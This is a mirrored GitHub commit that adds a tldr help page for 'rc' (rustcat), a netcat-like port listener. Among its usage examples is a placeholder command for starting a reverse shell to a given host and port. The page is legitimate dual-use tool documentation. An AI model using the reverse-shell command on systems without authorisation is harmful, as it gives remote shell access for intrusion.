1
0
Fork 0
mirror of https://github.com/tldr-pages/tldr.git synced 2025-07-24 15:35:27 +02:00

rc: add page (#6831)

This commit is contained in:
Joshua Shanks 2021-10-07 04:50:30 -07:00 committed by GitHub
parent d23184b464
commit e36515eb02
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

13
pages/common/rc.md Normal file
View file

@ -0,0 +1,13 @@
# rc
> A modern simplistic port listener & reverse shell.
> Similar to `nc`.
> More information: <https://github.com/robiot/rustcat/wiki/Basic-Usage>.
- Start listening on a specific port:
`rc -lp {{port}}`
- Start a reverse shell:
`rc {{host}} {{port}} -r {{shell}}`